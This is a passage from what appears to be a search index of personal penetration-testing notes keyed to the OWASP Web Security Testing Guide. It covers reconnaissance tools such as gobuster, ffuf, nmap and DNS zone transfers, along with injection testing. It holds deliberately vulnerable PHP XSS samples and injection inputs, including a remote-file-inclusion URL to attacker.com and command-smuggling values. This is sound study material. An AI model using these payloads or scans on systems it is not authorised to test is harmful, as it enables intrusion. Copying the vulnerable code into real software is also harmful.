        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-04/","title":"Enumerate Applications on Webserver","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

        ID Link to Hackinglife Link to OWASP Objectives 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers

        Web application discovery is a process aimed at identifying web applications on a given infrastructure:

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#1-different-based-url","title":"1. Different based URL","text":"

        https://example.com/application1 and https://example.com/application2

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#google-dork","title":"google dork","text":"

        If these applications are indexed, try this google dork:

        site:example.com\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#gobuster","title":"gobuster","text":"

        gobuster Cheat sheet.

        Brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner).

        gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# -b flag is to exclude from results an specific http response\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#more-tools","title":"More tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#2-non-standard-ports","title":"2. Non standard ports","text":"

        https://example.com:1234/ and https://example.com:8088/

        nmap -Pn -sT -p0-65535 $ip\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#3-virtual-hosts","title":"3. Virtual hosts","text":"

        https://example.com/ and https://webmail.example.com/

        A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

        There are two ways to configure virtual hosts:

        • IP-based virtual hosting
        • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#identify-name-server","title":"Identify name server","text":"
        host -t ns example.com\n

        Request a zone transfer for example.com from one of its nameservers:

        host -l example.com ns1.example.com\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#dns-enumeration","title":"DNS enumeration","text":"

        More about DNS enumeration.

        gobuster (More complete cheat sheet: gobuster)

        gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n

        Bash script, using Sec wordlist:

        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n

        dig (More complete cheat sheet: dig)

        # Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n\n# View all available records\ndig any example.com @$ip\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n

        nslookup (More complete cheat sheet: nslookup)

        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

        DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

        dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#vhost-enumeration","title":"VHOST enumeration","text":"

        vHost Fuzzing

        # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

        vHost Fuzzing with ffuf:

        # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n

        gobuster (More complete cheat sheet: gobuster)

        gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n

        Wfuzz (More complete cheat sheet: Wfuzz:

        wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-05/","title":"Review Webpage content for Information Leakage","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

        ID Link to Hackinglife Link to OWASP Objectives 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist.

        Sensitive information can include (but not limited to): Private API keys, internal IP addresses, debugging information, sensitive routes, or even credentials.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-http-comments","title":"Review HTTP comments","text":"
        <!--\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-metatags","title":"Review METAtags","text":"

        They do not provide a vector attack directly, but allows an attacker to profile an application:

        <META name=\"Author\" content=\"John Smith\">\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-javascript-comments","title":"Review javascript comments","text":"
        ```\n

        And

        /*\n

        And the <script> tag.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-source-map-files","title":"Review Source map files","text":"

        By adding .map extension to .js files.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-06/","title":"Identify Application Entry Points","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.6. Identify Application Entry Points

        ID Link to Hackinglife Link to OWASP Objectives 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#workflow","title":"Workflow","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#requests","title":"Requests","text":"
        • Identify GET and POST requests.
        • Identify parameters (hidden and not hidden, encoded and not, encrypted and not) in GET and POST requests.
        • Identify other methods.
        • Note additional or custom type headers
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#responses","title":"Responses","text":"
        • Identify when the \"Set-cookie\" is used, modified, added.
        • Identify patterns in responses: when you have 200, 302, 400, 403, or 500.
        • Pay attention to the response header \"Server.\"
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-the-attack-surface-detector-plugin","title":"Using the Attack Surface Detector plugin","text":"

        Download the Attack Surface Detector plugin in BurpSuite from: https://github.com/secdec/attack-surface-detector-cli/releases.

        Run this command from the Attack Surface Detector plugin:

        java -jar attack-surface-detector-cli-1.3.5.jar <source-code-path> [flags]\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#enumeration-techniques-for-http-verbs","title":"Enumeration techniques for HTTP verbs","text":"

        With netcat

        # Send a OPTIONS message with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-kiterunner","title":"Using Kiterunner","text":"

        kiterunner Cheat sheet.

        Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute force tools like Gobuster/Dirbuster/ work to discover URL paths, it typically relies on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

        1. First, download the dictionaries from the project. In my case I downloaded it to /usr/share/wordlists/kiterunner/:

        • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
        • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
        • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
        • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

        2. Run a quick scan of your target\u2019s URL or IP address like this:

        kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

        But. Note that we conducted this scan without any authorization headers, which the target API likely requires.

        To use a dictionary (and not a kite file):

        kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

        If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

        One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

        kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

        Running this will replay the request and provide you with the HTTP response.

        To run Kiterunner providing an authorization token as it could be \"x-access-token\", we can take the full authorization token and add it to your Kiterunner scan with the -H option:

        kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-07/","title":"Map Execution Paths through applications","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

        ID Link to Hackinglife Link to OWASP Objectives 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough

        Map the target application and understand the principal workflows (paths, data flow and race conditions.)

        You may use authomatic spidering tools such as Zed Attack Proxy (ZAP).

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#spidering","title":"Spidering","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#httrack","title":"HTTRack","text":"

        HTTRack tutorial

        Create a folder for replicating in it your target.

        mkdir targetsite\nhttrack domain.com  targetsite/\n

        Interactive mode:

        httrack\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#eyewitness","title":"EyeWitness","text":"

        EyeWitness tutorial

        First, create a file with the target domains, like for instance, listOfdomains.txt.

        Then, run:

        eyewitness --web -f listOfdomains.txt -d path/to/save/\n

        After that you will get a report.html file with the request and a screenshot of those domains.

        # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#directoryfile-enumeration","title":"Directory/File enumeration","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#nmap","title":"nmap","text":"
        nmap -sV -p80 --script=http-enum <target>\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#dirb","title":"dirb","text":"

        Cheat sheet with dirb.

        dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#gobuster","title":"gobuster","text":"

        Gobuster:

        gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,4.4 -x .php,.txt -r \n# -b: exclude from results an specific http response`\n# -r: follow redirects\n# -x: add to the path provided by dictionary these extensions\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#ffuf","title":"Ffuf","text":"

        Ffuf:

        ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#wfuzz","title":"Wfuzz","text":"

        Wfuzz

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#feroxbuster","title":"feroxbuster","text":"

        feroxbuster

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-08/","title":"Fingerprint Web Application Framework","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

        ID Link to Hackinglife Link to OWASP Objectives 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#http-headers","title":"HTTP headers","text":"
        • Note the response header X-Powered-By, or X-Generator as well.
        • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#html-source-code","title":"HTML source code","text":"
        • Framework is often include in the META tag.
        • Revise header and footer sections carefully: general markers and specific markers.
        • See typical file and folders structure. An example would be wp-includes folder for a wordpress installation, or a CHANGELOG file for a Drupal one.
        • Check out file extensions, as sometimes they reveals the underlying framework.
        • Revise error messages. They commonly reveals framework.

        See WSTG-INFO-07 for a reference to HTTRack for mirrowing the code and EyeWitness. These utilities replicated the source code of the target domain.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#tools","title":"Tools","text":"

        1. HTTP headers:

        X-Powered-By and cookies: - .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE> - PHP: PHPSESSID=<COOKIE_VALUE> - JAVA: JSESSION=<COOKIE_VALUE>

        2. whatweb.

        whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n

        3. Wappalyzer: https://www.wappalyzer.com.

        4. wafw00f:

        wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n

        5. Aquatone

        cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n

        6. Addons for browsers:

        • BuiltWith: BuiltWith\u00ae covers 93,551+ internet technologies which include analytics, advertising, hosting, CMS and many more.

        7. Curl:

        curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n

        8. nmap:

        sudo nmap -v $ip --script banner.nse\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-09/","title":"Fingerprint Web Applications","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.9. Fingerprint Web Applications

        ID Link to Hackinglife Link to OWASP Objectives 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08

        This content has been merged to Fingerprint Web Application Frameworks.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-09"]},{"location":"OWASP/WSTG-INFO-10/","title":"Map Application architecture","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.10. Map Application architecture

        ID Link to Hackinglife Link to OWASP Objectives 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs , Network and Security: Reverse proxy, IPS, WAF
        • In a blind testing, start with the assumption that there is a simple setup (a single server.)
        • Then, question if there is a firewall protecting the web server.
        • Is it a stateful firewall or is it an access list filter on a router? Is it bypasseable?
        • See response headers and try to identify a typical firewall response header.
        • Reverse proxies might be in use, and configured as Intrusion Prevention System.
        • Application- level firewall might be in use.
        • Proxy-caches can be in use.
        • Is there a Load Balancer in place? F5 BIG-IP load balancers introduces some prefixed cookies.
        • Some application web servers include values in the response or rewrite URLS automatically to do session tracking.
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-10"]},{"location":"OWASP/WSTG-INPV-01/","title":"Testing for Reflected Cross Site Scripting","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

        ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

        Reflected\u00a0Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client.

        XSS Filter Evasion Cheat Sheet

        ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#causes","title":"Causes","text":"

        This vulnerable PHP code in a welcome page may lead to an XSS attack:

        <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
        ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#attack-techniques","title":"Attack techniques","text":"

        Go to my XSS cheat sheet

        ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-02/","title":"Testing for Stored Cross Site Scripting","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

        ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

        Stored cross-site scripting is a vulnerability where an attacker is able to inject Javascript code into a web application\u2019s database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload in to a webpage on a website without proper sanitization, the XSS payload injected in to the webpage will be executed by the browser of anyone that visits that webpage.

        ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#causes","title":"Causes","text":"

        This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

        <?php \n$file  = 'newcomers.log';\nif(@$_GET['name']){\n    $current = file_get_contents($file);\n    $current .= $_GET['name'].\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin show newcomers\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=$name?>\n
        ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#attack-techniques","title":"Attack techniques","text":"

        Go to my XSS cheat sheet

        ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-03/","title":"Testing for HTTP Verb Tampering","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.3. Testing for HTTP Verb Tampering

        ID Link to Hackinglife Link to OWASP Description 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06

        This content has been merged into:\u00a0Test HTTP Methods

        ","tags":["web pentesting","WSTG-INPV-03"]},{"location":"OWASP/WSTG-INPV-04/","title":"Testing for HTTP Parameter Pollution","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.4. Testing for HTTP Parameter Pollution

        ID Link to Hackinglife Link to OWASP Description 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP.","tags":["web pentesting","WSTG-INPV-04"]},{"location":"OWASP/WSTG-INPV-05/","title":"Testing for SQL Injection","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

        ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it.

        SQL injection testing checks if it is possible to inject data into an application/site so that it executes a user-controlled SQL query in the database. Testers find a SQL injection vulnerability if the application uses user input to create SQL queries without proper input validation.

        ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-05/#see-my-notes","title":"See my notes","text":"
        • SQL injection: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
        • NoSQL injection: What is it. Typical payloads.
        • Manual attack.
        ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-06/","title":"Testing for LDAP Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.6. Testing for LDAP Injection

        ID Link to Hackinglife Link to OWASP Description 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user= user=user=)(uid=))(|(uid=* pass=password - Assess the severity of the injection:","tags":["web pentesting","WSTG-INPV-06"]},{"location":"OWASP/WSTG-INPV-07/","title":"Testing for XML Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.7. Testing for XML Injection

        ID Link to Hackinglife Link to OWASP Description 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \" , <>, , &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities.","tags":["web pentesting","WSTG-INPV-07"]},{"location":"OWASP/WSTG-INPV-08/","title":"Testing for SSI Injection","text":"OWASP
        [OWASP Web Security Testing Guide 4.2](index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection\n
        ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-08/#server-side-includes-ssi-injection","title":"Server-Side Includes (SSI) Injection","text":"

        SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

        SSI can lead to a Remote Command Execution (RCE), however most webservers have the exec directive disabled by default.

        ","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-09/","title":"Testing for XPath Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.9. Testing for XPath Injection

        ID Link to Hackinglife Link to OWASP Description 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: \u2018 or \u20181\u2019 = \u20181 Password: \u2018 or \u20181\u2019 = \u20181","tags":["web pentesting","WSTG-INPV-09"]},{"location":"OWASP/WSTG-INPV-10/","title":"Testing for IMAP SMTP Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.10. Testing for IMAP SMTP Injection

        ID Link to Hackinglife Link to OWASP Description 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, \u2018, \u201c, @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts.","tags":["web pentesting","WSTG-INPV-10"]},{"location":"OWASP/WSTG-INPV-11/","title":"Testing for Code Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.11. Testing for Code Injection

        ID Link to Hackinglife Link to OWASP Description 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity.","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-11/#local-file-inclusion","title":"Local File Inclusion","text":"

        See my notes on Local File Inclusion

        ","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-12/","title":"Testing for command injection","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.12. Testing for Command Injection

        ID Link to Hackinglife Link to OWASP Description 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:|

        Command injection vulnerabilities in the context of web application penetration testing occur when an attacker can manipulate the input fields of a web application in a way that allows them to execute arbitrary operating system commands on the underlying server. This type of vulnerability is a serious security risk because it can lead to unauthorized access, data theft, and full compromise of the web server.

        Causes:

        • User Input Handling: Web applications often take user input through forms, query parameters, or other means.
        • Lack of Input Sanitization: Insecurely coded applications may fail to properly validate, sanitize, or escape user inputs before using them in system commands.
        • Injection Points: Attackers identify injection points, such as input fields or URL query parameters, where they can insert malicious commands.

        Impact:

        • Unauthorized Execution: Attackers can execute arbitrary commands with the privileges of the web server process. This can lead to unauthorized data access, code execution, or system compromise.
        • Data Exfiltration: Attackers can exfiltrate sensitive data, such as database content, files, or system configurations.
        • System Manipulation: Attackers may manipulate the server, installmalware, or create backdoors for future access.
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#how-to-test","title":"How to Test","text":"

        Malicious Input: Attackers craft input that includes special characters, like semicolons, pipes, backticks, and other shell metacharacters, to break out of the intended input context and inject their commands. Command Execution: When the application processes the attacker's input, it constructs a shell command using the malicious input. The server, believing the command to be legitimate, executes it in the underlying operating system

        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#case-study-perl","title":"Case Study: Perl","text":"

        When viewing a file in a web application, the filename is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol | onto the end of the filename.

        # Example URL before alteration\nhttp://sensitive/cgi-bin/userData.pl?doc=user1.txt \n\n# Example URL modified\nhttp://sensitive/cgi-bin/userData.pl?doc=/bin/ls|\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php-code-injection","title":"PHP code injection","text":"

